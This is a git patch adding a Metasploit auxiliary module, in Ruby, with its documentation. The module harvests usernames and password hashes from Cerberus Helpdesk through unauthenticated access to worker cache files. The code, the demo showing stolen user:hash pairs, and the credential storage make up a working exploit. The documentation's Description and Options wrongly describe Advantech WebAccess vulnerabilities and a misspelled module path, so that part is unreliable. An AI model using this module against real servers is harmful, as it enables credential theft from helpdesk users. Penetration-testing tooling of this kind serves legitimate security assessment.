From f008f2aa8fcfbf490f184c3f98fbddc19eeca0c2 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 16 Jun 2017 08:24:54 -0400 Subject: [PATCH] working code --- .../cerberus_helpdesk_hash_disclosure.md | 69 +++++++++++++++++ .../cerberus_helpdesk_hash_disclosure.rb | 76 +++++++++++++++++++ 2 files changed, 145 insertions(+) create mode 100644 documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md create mode 100644 modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb diff --git a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md new file mode 100644 index 0000000000..8eed3fe7f2 --- /dev/null +++ b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md @@ -0,0 +1,69 @@ +## Description + +This module exploits three vulnerabilities in Advantech WebAccess. + +The first vulnerability is the ability for an arbitrary user to access the admin user list page, +revealing the username of every user on the system. + +The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with +the data of an arbitrary user. + +The final vulnerability exploited is that the HTML Form on the user edit page contains the user's +plain text password in the masked password input box. Typically the system should replace the +actual password with a masked character such as "*". + + +## Vulnerable Application + +Version 8.1 was tested during development: + +http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe + +8.2 is not vulnerable to this. + +## Verification Steps + +1. Start msfconsole +2. ```use auxiliary/gahter/advantech_webaccess_creds``` +3. ```set WEBACCESSUSER [USER]``` +4. ```set WEBACCESSPASS [PASS]``` +5. ```run``` + +## Options + +**WEBACCESSUSER** + +The username to use to log into Advantech WebAccess. By default, there is a built-in account +```admin``` that you could use. + +**WEBACCESSPASS** + +The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin``` +does not have a password, which could be something you can use. + + +## Demo + +msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure +msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options + +Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target address range or CIDR identifier + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + THREADS 1 yes The number of concurrent threads + URI / no URL of the Cerberus Helpdesk root + VHOST no HTTP server virtual host + +msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81 +rhosts => 10.90.5.81 +msf auxiliary(cerberus_helpdesk_hash_disclosure) > run + +[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers +[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b +[+] example:112302c209fe8d73f502c132a3da2b1c +[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7 diff --git a/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb new file mode 100644 index 0000000000..02bb9dc5ef --- /dev/null +++ b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb @@ -0,0 +1,76 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Cerberus Helpdesk User Hash Disclosure', + 'Description' => %q{ + This module extracts usernames and password hashes from the Cerberus Helpdesk + through an unauthenticated accss to a workers file. + Verified on Version 4.2.3 Stable (Build 925) + }, + 'References' => + [ + [ 'EDB', '39526' ] + ], + 'Author' => [ + 'asdizzle_', #discovery + 'h00die', #module + ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('URI', [false, 'URL of the Cerberus Helpdesk root', '/']) + ]) + end + + def run_host(rhost) + begin + ['devblocks', 'zend'].each do |site| + url = "#{datastore['URI']}storage/tmp/#{site}_cache---ch_workers" + vprint_status("Attempting to load data from #{url}") + res = send_request_cgi({'uri' => url}) + if not res + print_error("#{peer} Unable to connect to #{url}") + else + if res.body.include?('pass') + # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing. + # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g' + result = res.body.split('s:5') + result.each do |cred| + if cred.include?('email') + cred = cred.split(':') + username = cred[3].tr('";', '') # remove extra characters + username = username[0...-1] # also remove trailing s + password_hash = cred[7].tr('";', '') # remove extra characters + print_good("#{username}:#{password_hash}") + store_valid_credential( + user: username, + private: password_hash, + private_type: :nonreplayable_hash + ) + end + end + break # no need to get the 2nd url + else + print_error("Invalid response received for #{url}") + end + end + end + + rescue ::Rex::ConnectionError + print_error("#{peer} Unable to connect to site") + return + end + end +end